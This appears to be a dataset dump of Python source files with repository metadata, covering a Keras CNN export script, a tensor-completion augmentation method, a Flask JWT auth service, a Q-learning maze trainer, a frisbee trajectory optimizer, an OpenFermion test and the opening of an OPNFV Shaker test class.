fe468cffe0b2fb47619682741847648e0145af63
| 3,704
|
py
|
Python
|
app/backend-test/core_models/keras-experiments/run02_try_simple_CNN_generate.py
|
SummaLabs/DLS
|
2adba47430b456ad0f324e4c8883a896a23b3fbf
|
[
"MIT"
] | 32
|
2017-09-04T17:40:39.000Z
|
2021-02-16T23:08:34.000Z
|
app/backend-test/core_models/keras-experiments/run02_try_simple_CNN_generate.py
|
AymanNabih/DLS
|
2adba47430b456ad0f324e4c8883a896a23b3fbf
|
[
"MIT"
] | 3
|
2017-10-09T12:52:54.000Z
|
2020-06-29T02:48:38.000Z
|
app/backend-test/core_models/keras-experiments/run02_try_simple_CNN_generate.py
|
AymanNabih/DLS
|
2adba47430b456ad0f324e4c8883a896a23b3fbf
|
[
"MIT"
] | 20
|
2017-10-07T17:29:50.000Z
|
2021-01-23T22:01:54.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
__author__ = 'ar'
import json
import os
import skimage.io as skio
import matplotlib.pyplot as plt
import numpy as np
import keras
from keras.models import Model
from keras.layers import Input, Convolution2D, MaxPooling2D, Flatten, Dense
from keras.utils.visualize_util import plot as kplot
##################################
def buildModelCNN(inpShape=(3,128,128), sizFlt = 3, numFltStart=16, numCls=2, numHidden=128, funact='relu'):
inpData = Input(shape=inpShape)
# Conv 1'st
x = Convolution2D(nb_filter=1 * numFltStart, nb_row=sizFlt, nb_col=sizFlt, activation=funact,
border_mode='same')(inpData)
x = MaxPooling2D(pool_size=(2,2))(x)
# Conv 2'nd
x = Convolution2D(nb_filter=2 * numFltStart, nb_row=sizFlt, nb_col=sizFlt, activation=funact,
border_mode='same')(x)
x = MaxPooling2D(pool_size=(2,2))(x)
# Conv 3'rd
x = Convolution2D(nb_filter=3 * numFltStart, nb_row=sizFlt, nb_col=sizFlt, activation=funact,
border_mode='same')(x)
x = MaxPooling2D(pool_size=(2, 2))(x)
# Conv 4'th
x = Convolution2D(nb_filter=4 * numFltStart, nb_row=sizFlt, nb_col=sizFlt, activation=funact,
border_mode='same')(x)
x = MaxPooling2D(pool_size=(2, 2))(x)
# Conv 5'th
x = Convolution2D(nb_filter=5 * numFltStart, nb_row=sizFlt, nb_col=sizFlt, activation=funact,
border_mode='same')(x)
x = MaxPooling2D(pool_size=(2, 2))(x)
#
x = Flatten()(x)
if numHidden is not None:
x = Dense(output_dim=numHidden, activation=funact)(x)
x = Dense(output_dim=numCls, activation='softmax')(x)
retModel = Model(inpData, x)
return retModel
##################################
def getBasicModelTemplate(modelName='model_1'):
retTemplate = {
"class_name": "Model",
"keras_version": keras.__version__,
"config": {
"name": "%s" % modelName,
"layers" : [],
"input_layers": [],
"output_layers": [],
}
}
return retTemplate
def generateModelJsonDict(model):
tmpl = getBasicModelTemplate()
tmpLayers = []
for ii,ll in enumerate(model.layers):
tmp = {
'class_name': type(ll).__name__,
'name': ll.name,
'config': ll.get_config(),
}
if ii==0:
tmp['inbound_nodes'] = []
else:
tmp['inbound_nodes'] = [[
[
model.layers[ii-1].name,
0,
0
]
]]
tmpLayers.append(tmp)
tmpl['config']['layers'] = tmpLayers
tmpl['config']['input_layers'] = [
[
model.layers[0].name,
0,
0
]
]
tmpl['config']['output_layers'] = [
[
model.layers[-1].name,
0,
0
]
]
return tmpl
##################################
if __name__ == '__main__':
model = buildModelCNN(inpShape=(3, 128, 128))
fimgModel = 'keras-model-cnn.jpg'
kplot(model, fimgModel, show_shapes=True)
# plt.imshow(skio.imread(fimgModel))
# plt.show()
model.summary()
print ('------')
numLayers = len(model.layers)
for ii,ll in enumerate(model.layers):
print ('[%d/%d] : %s' % (ii, numLayers, ll))
modelJson = generateModelJsonDict(model)
print ('----------------------')
print (json.dumps(modelJson, indent=4))
foutJson = 'test-model-cnn.json'
with open(foutJson, 'w') as f:
json.dump(modelJson, f, indent=4)
# print (json.dumps(modelJson, indent=4))
| 31.389831
| 108
| 0.551026
| 418
| 3,704
| 4.739234
| 0.301435
| 0.04846
| 0.040384
| 0.055528
| 0.341747
| 0.289248
| 0.25896
| 0.229682
| 0.215548
| 0.215548
| 0
| 0.025516
| 0.280508
| 3,704
| 117
| 109
| 31.65812
| 0.717824
| 0.046976
| 0
| 0.145833
| 0
| 0
| 0.085773
| 0.00644
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03125
| false
| 0
| 0.09375
| 0
| 0.15625
| 0.041667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe4908b1c0b067e1655d4c242e84ebb2602b1af5
| 11,218
|
py
|
Python
|
src/main.py
|
srijankr/DAIN
|
89edec24e63383dfd5ef19f2bfb48d11b75b3dde
|
[
"Apache-2.0"
] | 3
|
2021-08-19T20:11:45.000Z
|
2021-08-23T14:20:11.000Z
|
src/main.py
|
srijankr/DAIN
|
89edec24e63383dfd5ef19f2bfb48d11b75b3dde
|
[
"Apache-2.0"
] | null | null | null |
src/main.py
|
srijankr/DAIN
|
89edec24e63383dfd5ef19f2bfb48d11b75b3dde
|
[
"Apache-2.0"
] | null | null | null |
#@contact Sejoon Oh (soh337@gatech.edu), Georgia Institute of Technology
#@version 1.0
#@date 2021-08-17
#Influence-guided Data Augmentation for Neural Tensor Completion (DAIN)
#This software is free of charge under research purposes.
#For commercial purposes, please contact the main author.
import torch
from torch import nn
from torch.utils.data import Dataset, DataLoader
import argparse
import numpy as np
from dataset import TensorDataset
import torch.optim as optim
from model import MLP
import pandas as pd
import copy
import random
from sklearn.model_selection import train_test_split
import os
def parse_args():
parser = argparse.ArgumentParser(description="Run DAIN for the MLP architecture")
parser.add_argument('--path', nargs='?', default='data/synthetic_10K.tensor',
help='Input data path.')
parser.add_argument('--epochs', type=int, default=50,
help='Number of epochs.')
parser.add_argument('--batch_size', type=int, default=1024,
help='Batch size.')
parser.add_argument('--layers', nargs='?', default='[150,1024,1024,128]',
help="Size of each layer. Note that the first layer is the concatenation of tensor embeddings. So layers[0]/N (N=order) is the tensor embedding size.")
parser.add_argument('--lr', type=float, default=0.001,
help='Learning rate.')
parser.add_argument('--verbose', type=int, default=5,
help='Show performance per X iterations')
parser.add_argument('--gpu', type=str, default='0',
help='GPU number')
parser.add_argument('--output', type=str, default='demo.txt',
help = 'output name')
parser.add_argument('--train_ratio', type=float, default=0.9,
help = 'Ratio of training data')
return parser.parse_args()
def model_train_and_test(args, model, train_loader, val_loader,test_loader,first):
output_path = 'output/'+args.output
criterion = nn.MSELoss()
optimizer = optim.Adam(model.parameters(), lr = args.lr)
device = model.device
min_val,min_test,min_epoch,final_model = 9999,9999,0,0
for epoch in range(args.epochs):
torch.cuda.empty_cache()
running_loss = 0.0
train_loss,valid_loss = 0,0
for i, data in enumerate(val_loader, 0):
inputs, labels, indices = data[0].to(device), data[1].to(device),data[2]
outputs = model(inputs).flatten()
if first==True:
inter = model.intermediate.cpu().detach().clone()
error = (outputs - labels).reshape(-1,1).cpu().detach().clone()
model.allgrad[epoch,indices,:] = torch.mul(inter,error)
loss = criterion(outputs,labels)
loss.backward()
valid_loss += loss.item()
del inputs,labels,outputs,model.intermediate
valid_loss /= (i+1)
test_loss, test_accuracy = 0,0
for i, data in enumerate(test_loader, 0):
inputs, labels,indices = data[0].to(device), data[1].to(device),data[2]
prediction = model(inputs).flatten()
loss = criterion(prediction,labels)
loss.backward()
test_accuracy += torch.sum(torch.pow((prediction-labels),2)).cpu().item()
del inputs,labels,prediction,model.intermediate
test_accuracy/=len(test_loader.dataset)
for i, data in enumerate(train_loader, 0):
inputs, labels,indices = data[0].to(device), data[1].to(device),data[2]
optimizer.zero_grad()
outputs = model(inputs).flatten()
if first==True:
inter = model.intermediate.cpu().detach().clone()
error = (outputs-labels).reshape(-1,1).cpu().detach().clone()
model.allgrad[epoch,indices,:] = torch.mul(inter,error)
loss = criterion(outputs, labels)
loss.backward()
optimizer.step()
train_loss += loss.item()
del inputs, labels, outputs,indices,model.intermediate
train_loss /= (i+1)
if epoch%args.verbose==0:
print('[%d] Train loss: %.3f\tValid loss = %.6f\t(Test RMSE = %.6f)\t' % (epoch + 1, train_loss, valid_loss,test_accuracy))
print('[%d] Train loss: %.3f\tValid loss = %.6f\t(Test RMSE = %.6f)\t' % (epoch + 1, train_loss, valid_loss,test_accuracy),file=open(output_path,"a"),flush=True)
if min_val<=valid_loss and epoch-min_epoch>=10:
break
if min_val>valid_loss:
min_val = valid_loss
min_test = test_accuracy
min_epoch = epoch
final_model = copy.deepcopy(model)
final_model.allgrad = copy.deepcopy(model.allgrad)
final_model.checkpoint = epoch+1
print('Finished Training\nFinal Test RMSE = {} @ (Epoch,validation loss) ({},{})\n'.format(min_test,min_epoch,min_val))
print('Finished Training\nFinal Test RMSE = {} @ (Epoch,validation loss) ({},{})\n'.format(min_test,min_epoch,min_val), file=open(output_path, "a"),flush=True)
del model
return min_test,final_model
def data_augmentation(trainset,new_tensor,new_val,val_loader,test_loader,args,device):
#Step 4: data augmentation
if new_tensor.shape[0]!=0:
cur_trainset = copy.deepcopy(trainset)
new_indices = torch.zeros(new_tensor.shape[0]).long()
cur_trainset.add(new_tensor,new_val,new_indices)
first = False
#Step 1: tensor embedding learning
else:
cur_trainset = copy.deepcopy(trainset)
first = True
layers = eval(args.layers)
train_loader = DataLoader(cur_trainset, batch_size=args.batch_size,shuffle=True)
model = MLP(cur_trainset, device, layers=layers).to(device)
model.allgrad = []
if first==True:
model.allgrad = torch.zeros(int(args.epochs),len(cur_trainset)+len(val_loader.dataset)+len(test_loader.dataset),model.last_size)
test_rmse,final_model = model_train_and_test(args, model, train_loader, val_loader, test_loader,first)
del cur_trainset
if new_tensor.shape[0]!=0:
del new_tensor
if new_val.shape[0]!=0:
del new_val
del model
if first==True:
print('[DONE] Step 1: tensor embedding learning')
#Step 2: cell importance calculation
train_idx,val_idx,test_idx = train_loader.dataset.indices,val_loader.dataset.indices,test_loader.dataset.indices
checkpoint = final_model.checkpoint
val_grad = torch.sum(final_model.allgrad[:checkpoint,val_idx,:],dim=1).squeeze()
maxv,maxp = -9999,0
final_model.importance = np.zeros(len(trainset))
for (i,idx) in enumerate(trainset.indices):
train_grad = final_model.allgrad[:checkpoint,idx,:].squeeze()
contribution = torch.mul(train_grad,val_grad)
final_contribution = torch.sum(torch.sum(contribution,dim=1),dim=0).item()
final_model.importance[i] = final_contribution
final_model.importance = final_model.importance / max(final_model.importance)
return (test_rmse,final_model)
def main():
args = parse_args()
path = args.path
layers = eval(args.layers)
learning_rate = args.lr
batch_size = args.batch_size
epochs = args.epochs
verbose = args.verbose
output_path = 'output/'+args.output
if os.path.exists('output/')==False:
os.mkdir('output/')
dataset = TensorDataset(path)
trainset,valset, testset,indices = copy.deepcopy(dataset),copy.deepcopy(dataset),copy.deepcopy(dataset),np.arange(dataset.num_data)
data_train, data_test, labels_train, labels_test, index_train, index_test = train_test_split(dataset.tensor.numpy(), dataset.val.numpy(), indices, test_size=1-args.train_ratio)
data_train, data_val, labels_train, labels_val, index_train, index_val = train_test_split(data_train, labels_train, index_train, test_size=0.2)
trainset.tensor,trainset.val,trainset.num_data,trainset.indices = torch.from_numpy(data_train).long(),torch.from_numpy(labels_train).float(),data_train.shape[0],torch.from_numpy(index_train).long()
valset.tensor,valset.val,valset.num_data,valset.indices = torch.from_numpy(data_val).long(),torch.from_numpy(labels_val).float(),data_val.shape[0],torch.from_numpy(index_val).long()
testset.tensor, testset.val, testset.num_data,testset.indices = torch.from_numpy(data_test).long(), torch.from_numpy(labels_test).float(), data_test.shape[0],torch.from_numpy(index_test).long()
train_loader = DataLoader(trainset, batch_size=batch_size, shuffle=True)
val_loader = DataLoader(valset, batch_size=batch_size, shuffle=True)
test_loader = DataLoader(testset, batch_size=batch_size, shuffle=True)
print('[DONE] Step 0: Dataset loading & train-val-test split')
print(dataset.dimensionality)
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]=args.gpu
# CUDA for PyTorch
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
print(device)
#Step 1&2. Train tensor embeddings & calculate cell importance
(rmse,model) = data_augmentation(trainset,torch.empty(0),torch.empty(0),val_loader,test_loader,args,device)
print('Test RMSE before 50% data augmentation = {}'.format(rmse))
print('Test RMSE before 50% data augmentation = {}'.format(rmse),file=open(output_path,"a"))
original = copy.deepcopy(model)
del model
cell_importance = abs(original.importance)
print('[DONE] Step 2: cell importance calculation')
#Step 3. entity importance calculation
entity_importance = [np.zeros(dataset.dimensionality[i]) for i in range(dataset.order)]
for i in range(len(cell_importance)):
for j in range(dataset.order):
entity = int(trainset.tensor[i,j])
entity_importance[j][entity] += cell_importance[i]
for i in range(dataset.order):
cur = entity_importance[i]
entity_importance[i] = cur/sum(cur)
print('[DONE] Step 3: entity importance calculation')
num_aug = int(0.5 * trainset.tensor.shape[0])
print('Number of augmented data = {}\tTotal number of training data = {}'.format(num_aug,num_aug+len(trainset)))
print('Number of augmented data = {}\tTotal number of training data = {}'.format(num_aug,num_aug+len(trainset)), file=open(output_path, "a"),flush=True)
#Step 4. perform data augmentation
indices = np.zeros((num_aug,trainset.order))
for i in range(dataset.order):
indices[:,i] = np.random.choice(list(range(0,dataset.dimensionality[i])),size=num_aug,p = entity_importance[i])
new_tensor = torch.from_numpy(indices).long()
new_val = original.predict(new_tensor)
print('[DONE] Step 4: data augmentation with entity importance')
(rmse,model) = data_augmentation(trainset,new_tensor,new_val,val_loader,test_loader,args,device)
print('Test RMSE after 50% data augmentation = {}'.format(rmse))
print('Test RMSE after 50% data augmentation = {}'.format(rmse),file=open(output_path,"a"))
del model
if __name__ == "__main__":
main()
| 45.97541
| 201
| 0.668123
| 1,505
| 11,218
| 4.821262
| 0.168106
| 0.020673
| 0.019294
| 0.013093
| 0.375
| 0.29355
| 0.246692
| 0.213341
| 0.213341
| 0.191428
| 0
| 0.015459
| 0.204225
| 11,218
| 243
| 202
| 46.164609
| 0.797356
| 0.047602
| 0
| 0.179894
| 0
| 0.015873
| 0.125679
| 0.002343
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021164
| false
| 0
| 0.137566
| 0
| 0.174603
| 0.089947
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe4b1dcb47180e465318d2ca261b6bc60c83e970
| 1,933
|
py
|
Python
|
backend/app/auth/service.py
|
pers0n4/yoonyaho
|
cf7518667bc7cefff0f9534a5e0af89b261cfed7
|
[
"MIT"
] | null | null | null |
backend/app/auth/service.py
|
pers0n4/yoonyaho
|
cf7518667bc7cefff0f9534a5e0af89b261cfed7
|
[
"MIT"
] | 16
|
2021-04-04T10:58:24.000Z
|
2021-05-23T11:52:08.000Z
|
backend/app/auth/service.py
|
pers0n4/yoonyaho
|
cf7518667bc7cefff0f9534a5e0af89b261cfed7
|
[
"MIT"
] | null | null | null |
from datetime import datetime, timedelta
import jwt
from flask import current_app
from app import db
from app.user.repository import UserRepository
class AuthService:
def __init__(self) -> None:
self._user_repository = UserRepository(db.session)
def create_token(self, data) -> dict:
user = self._user_repository.find_one(user_id=data["user_id"])
if user is None:
# user not found
raise RuntimeError
if not user.check_password(data["password"]):
# password
raise RuntimeError
access_token = jwt.encode(
{
"iat": datetime.utcnow(),
"exp": datetime.utcnow() + timedelta(minutes=60),
"user_id": str(user.id),
},
current_app.config["SECRET_KEY"],
algorithm="HS512",
)
refresh_token = jwt.encode(
{
"iat": datetime.utcnow(),
"exp": datetime.utcnow() + timedelta(hours=4),
},
current_app.config["SECRET_KEY"],
algorithm="HS512",
)
return {"access_token": access_token, "refresh_token": refresh_token}
def validate_token(self, token) -> dict:
return jwt.decode(token, current_app.config["SECRET_KEY"], algorithms=["HS512"])
def refresh_token(self, token) -> dict:
payload = self.validate_token(token)
user = self._user_repository.find_one(id=payload["user_id"])
if user is None:
# user not found
raise RuntimeError
access_token = jwt.encode(
{
"iat": datetime.utcnow(),
"exp": datetime.utcnow() + timedelta(minutes=60),
"user_id": str(user.id),
},
current_app.config["SECRET_KEY"],
algorithm="HS512",
)
return {"access_token": access_token}
| 30.203125
| 88
| 0.558717
| 201
| 1,933
| 5.174129
| 0.273632
| 0.040385
| 0.061538
| 0.084615
| 0.575
| 0.550962
| 0.495192
| 0.495192
| 0.495192
| 0.495192
| 0
| 0.013107
| 0.329022
| 1,933
| 63
| 89
| 30.68254
| 0.788743
| 0.019659
| 0
| 0.408163
| 0
| 0
| 0.079852
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.081633
| false
| 0.020408
| 0.102041
| 0.020408
| 0.265306
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe4c72b51d2a6fb97aa207f15cdf6884d9d32013
| 4,843
|
py
|
Python
|
scripts/qlearn.py
|
kebaek/minigrid
|
3808c1401ea7846febf88d0a2fb2aa39e4a4913f
|
[
"MIT"
] | 5
|
2021-09-29T18:53:37.000Z
|
2022-03-01T08:03:42.000Z
|
scripts/qlearn.py
|
kebaek/minigrid
|
3808c1401ea7846febf88d0a2fb2aa39e4a4913f
|
[
"MIT"
] | null | null | null |
scripts/qlearn.py
|
kebaek/minigrid
|
3808c1401ea7846febf88d0a2fb2aa39e4a4913f
|
[
"MIT"
] | null | null | null |
import _init_paths
import argparse
import random
import time
import utils
import os
from collections import defaultdict
import numpy as np
import csv
from progress.bar import IncrementalBar
from utils.hash import *
def parse_arguments():
parser = argparse.ArgumentParser()
# add arguments
parser.add_argument('--env', type=str, default='../env/maze_2.txt',
help='name of the environment')
parser.add_argument("--dir", type=str, default="",
help="name of the directory to episodes")
parser.add_argument('--num_episode', type=int, default=2000,
help='the number of train episodes')
parser.add_argument('--max_episode_length', type=int, default=200,
help='the maximum of the length of an episode')
parser.add_argument('--lr', type=float, default=0.1,
help='the learning rate of the q learning algorithm')
parser.add_argument('--discount', type=float, default=0.9,
help='the discount factor')
parser.add_argument('--eps', type=float, default=0.8,
help='the value for the eps-greedy strategy')
parser.add_argument('--seed', type=int, default=0,
help='random seed for environment')
# parse arguments
args = parser.parse_args()
return args
def train(maze_env, model_dir, num_episode, max_episode_length, lr,
discount, eps, **kwargs):
# create value function and q value function
q_value_function = {}
visited_actions = {}
visited_states = set()
q_value_function = defaultdict(lambda: 0, q_value_function)
visited_actions = defaultdict(lambda: [False]*maze_env.action_space.n, visited_actions)
# train agent
start = time.time()
episodes_length = []
bar = IncrementalBar('Countdown', max = num_episode)
print("Start to train q value function.")
for _ in range(num_episode):
current_length = 0
is_terminal = 0
obs = maze_env.reset()
state = str(maze_env)
while not is_terminal:
visited_states.add(state)
if random.random() <= eps:
action = random.randint(0, maze_env.action_space.n - 1)
else:
action, value = get_max_action(state, q_value_function, maze_env)
if value == 0:
if False in visited_actions[state]:
action = visited_actions[state].index(False)
else:
action = random.randint(0, maze_env.action_space.n - 1)
visited_actions[state][action] = True
next_obs, reward, is_terminal, info = maze_env.step(action)
next_state = str(maze_env)
current_length += 1
next_action, next_q_value = get_max_action(next_state, q_value_function, maze_env)
max_q_value_target = reward + discount*next_q_value
q_value_function[hash_state_action(state, action)] = (1 - lr) * \
q_value_function[hash_state_action(state, action)] + lr*max_q_value_target
state = next_state
bar.next()
episodes_length.append(current_length)
print("Finish training q value function.")
end = time.time()
bar.finish()
print("[Statistics]: Avg_length {0} and Time {1}s".format(sum(episodes_length) / len(episodes_length), end - start))
# output
print("Start to output q value function and policy to file.")
file = open(model_dir + '/q_value.csv', "w")
fieldnames = ['state', 'action', 'value']
writer = csv.DictWriter(file, fieldnames=fieldnames)
for key, value in q_value_function.items():
state, action = reverse_hashing_state_action(key)
writer.writerow({'state':state, 'action':action, 'value':value})
file.close()
file = open(model_dir + '/policy.csv', "w")
fieldnames = ['state', 'action']
writer = csv.DictWriter(file, fieldnames=fieldnames)
for state in visited_states:
action, value = get_max_action(state, q_value_function, maze_env)
if value == 0:
action = -1
writer.writerow({'state':state, 'action':action})
file.close()
print("Finish outputting q value function to file.")
def main():
# parse arguments
args = parse_arguments()
# create env
maze_env = utils.make_env(args.env, args.seed + 10000)
print('Environment Loaded\n')
model_dir = utils.get_model_dir(args.env + '/' + args.dir + '/aQL/lr%.2f_discount%.2f_eps%.2f/epi%dseed%d'%(args.lr, args.discount, args.eps, args.num_episode, args.seed))
os.makedirs(model_dir, exist_ok=True)
print(model_dir)
# train agent
train(maze_env, model_dir, **vars(args))
if __name__ == '__main__':
main()
| 38.133858
| 175
| 0.628536
| 617
| 4,843
| 4.726094
| 0.243112
| 0.039095
| 0.067215
| 0.01749
| 0.215706
| 0.159122
| 0.125514
| 0.093964
| 0.066529
| 0.066529
| 0
| 0.010301
| 0.258311
| 4,843
| 126
| 176
| 38.436508
| 0.801503
| 0.026843
| 0
| 0.118812
| 0
| 0
| 0.148597
| 0.009354
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029703
| false
| 0
| 0.108911
| 0
| 0.148515
| 0.069307
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe4cffed78f06b24cc3c09215a327c208310e601
| 1,634
|
py
|
Python
|
research/tunnel.py
|
carrino/FrisPy
|
db9e59f465ee25d1c037d580c37da8f35b930b50
|
[
"MIT"
] | null | null | null |
research/tunnel.py
|
carrino/FrisPy
|
db9e59f465ee25d1c037d580c37da8f35b930b50
|
[
"MIT"
] | null | null | null |
research/tunnel.py
|
carrino/FrisPy
|
db9e59f465ee25d1c037d580c37da8f35b930b50
|
[
"MIT"
] | null | null | null |
import math
from pprint import pprint
import matplotlib.pyplot as plt
from scipy.optimize import minimize
from frispy import Disc
from frispy import Discs
from frispy import Model
model = Discs.roc
mph_to_mps = 0.44704
v = 56 * mph_to_mps
rot = -v / model.diameter
ceiling = 4 # 4 meter ceiling
tunnel_width = 4 # 4 meter wide tunnel
def distance(x):
a, nose_up, hyzer = x
d = Disc(model, {"vx": math.cos(a * math.pi / 180) * v, "dgamma": rot, "vz": math.sin(a * math.pi / 180) * v,
"nose_up": nose_up, "hyzer": hyzer})
r = d.compute_trajectory(15.0, **{"max_step": .2})
rx = r.x[-1]
ry = abs(r.y[-1])
overCelingIndex = next(filter(lambda i: r.z[i] > ceiling, range(len(r.z))), None)
if overCelingIndex is not None:
return -r.x[overCelingIndex]
outsideTunnelIndex = next(filter(lambda i: math.fabs(r.y[i]) > tunnel_width / 2, range(len(r.z))), None)
if outsideTunnelIndex is not None:
return -r.x[outsideTunnelIndex]
return -rx + ry / (rx + ry)
bnds = [(-90, 90)] * 3
x0 = [6, -3, 10]
res = minimize(distance, x0, method='powell', bounds=bnds, options={'xtol': 1e-8, 'disp': True})
pprint(res)
a, nose_up, hyzer = res.x
disc = Disc(model, {"vx": math.cos(a * math.pi / 180) * v, "dgamma": rot, "vz": math.sin(a * math.pi / 180) * v,
"nose_up": nose_up, "hyzer": hyzer})
result = disc.compute_trajectory(15.0, **{"max_step": .2})
times = result.times
t, x, y, z = result.times, result.x, result.y, result.z
#plt.plot(x, y)
#plt.plot(x, z)
#plt.plot(t, x)
plt.plot(t, y)
plt.plot(t, z)
pprint(x[-1] * 3.28084) # feet
plt.show()
| 27.694915
| 113
| 0.621787
| 274
| 1,634
| 3.649635
| 0.350365
| 0.036
| 0.044
| 0.04
| 0.282
| 0.282
| 0.216
| 0.16
| 0.16
| 0.16
| 0
| 0.04234
| 0.205018
| 1,634
| 58
| 114
| 28.172414
| 0.727483
| 0.050184
| 0
| 0.04878
| 0
| 0
| 0.047896
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02439
| false
| 0
| 0.170732
| 0
| 0.268293
| 0.073171
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe4e0e23c7947f7d713c88797190743b2b4ea285
| 1,450
|
py
|
Python
|
openfermioncirq/variational/ansatzes/swap_network_trotter_hubbard_test.py
|
unpilbaek/OpenFermion-Cirq
|
d2f5a871bb5aea1e53d280c0a0e4be999b0c8d9d
|
[
"Apache-2.0"
] | 278
|
2018-07-18T23:43:16.000Z
|
2022-01-02T21:38:08.000Z
|
openfermioncirq/variational/ansatzes/swap_network_trotter_hubbard_test.py
|
unpilbaek/OpenFermion-Cirq
|
d2f5a871bb5aea1e53d280c0a0e4be999b0c8d9d
|
[
"Apache-2.0"
] | 131
|
2018-07-18T19:04:58.000Z
|
2020-08-04T21:05:42.000Z
|
openfermioncirq/variational/ansatzes/swap_network_trotter_hubbard_test.py
|
unpilbaek/OpenFermion-Cirq
|
d2f5a871bb5aea1e53d280c0a0e4be999b0c8d9d
|
[
"Apache-2.0"
] | 101
|
2018-07-18T21:43:50.000Z
|
2022-03-04T09:51:02.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from openfermioncirq.variational.ansatzes import SwapNetworkTrotterHubbardAnsatz
def test_swap_network_trotter_hubbard_ansatz_param_bounds():
ansatz = SwapNetworkTrotterHubbardAnsatz(3, 1, 1.0, 4.0, periodic=False)
assert list(symbol.name for symbol in ansatz.params()) == [
'Th_0', 'V_0',]
assert ansatz.param_bounds() == [
(-2.0, 2.0), (-1.0, 1.0)]
ansatz = SwapNetworkTrotterHubbardAnsatz(1, 4, 1.0, 4.0, periodic=False)
assert list(symbol.name for symbol in ansatz.params()) == [
'Tv_0', 'V_0',]
assert ansatz.param_bounds() == [
(-2.0, 2.0), (-1.0, 1.0)]
ansatz = SwapNetworkTrotterHubbardAnsatz(3, 2, 1.0, 4.0)
assert list(symbol.name for symbol in ansatz.params()) == [
'Th_0', 'Tv_0', 'V_0',]
assert ansatz.param_bounds() == [
(-2.0, 2.0), (-2.0, 2.0), (-1.0, 1.0)]
| 41.428571
| 80
| 0.65931
| 210
| 1,450
| 4.471429
| 0.414286
| 0.021299
| 0.019169
| 0.021299
| 0.374867
| 0.374867
| 0.374867
| 0.374867
| 0.366347
| 0.366347
| 0
| 0.049912
| 0.212414
| 1,450
| 34
| 81
| 42.647059
| 0.772329
| 0.370345
| 0
| 0.470588
| 0
| 0
| 0.027809
| 0
| 0
| 0
| 0
| 0
| 0.352941
| 1
| 0.058824
| false
| 0
| 0.058824
| 0
| 0.117647
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe52100e092cba8f28b9f872d87740877e78ee29
| 5,535
|
py
|
Python
|
functest/opnfv_tests/openstack/shaker/shaker.py
|
opnfv-poc/functest
|
4f54b282cabccef2a53e21c77c81b60fe890a8a4
|
[
"Apache-2.0"
] | null | null | null |
functest/opnfv_tests/openstack/shaker/shaker.py
|
opnfv-poc/functest
|
4f54b282cabccef2a53e21c77c81b60fe890a8a4
|
[
"Apache-2.0"
] | null | null | null |
functest/opnfv_tests/openstack/shaker/shaker.py
|
opnfv-poc/functest
|
4f54b282cabccef2a53e21c77c81b60fe890a8a4
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# Copyright (c) 2018 Orange and others.
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Apache License, Version 2.0
# which accompanies this distribution, and is available at
# http://www.apache.org/licenses/LICENSE-2.0
"""
Shaker_ wraps around popular system network testing tools like iperf, iperf3
and netperf (with help of flent). Shaker is able to deploy OpenStack instances
and networks in different topologies. Shaker scenario specifies the deployment
and list of tests to execute.
.. _Shaker: http://pyshaker.readthedocs.io/en/latest/
"""
import logging
import os
import json
import scp
from functest.core import singlevm
from functest.utils import env
class Shaker(singlevm.SingleVm2):
"""Run shaker full+perf l2 and l3"""
# pylint: disable=too-many-instance-attributes
__logger = logging.getLogger(__name__)
filename = '/home/opnfv/functest/images/shaker-image-1.3.0+stretch.qcow2'
flavor_ram = 512
flavor_vcpus = 1
flavor_disk = 3
username = 'debian'
port = 9000
ssh_connect_loops = 12
create_server_timeout = 300
shaker_timeout = '3600'
quota_instances = -1
quota_cores = -1
def __init__(self, **kwargs):
super(Shaker, self).__init__(**kwargs)
self.role = None
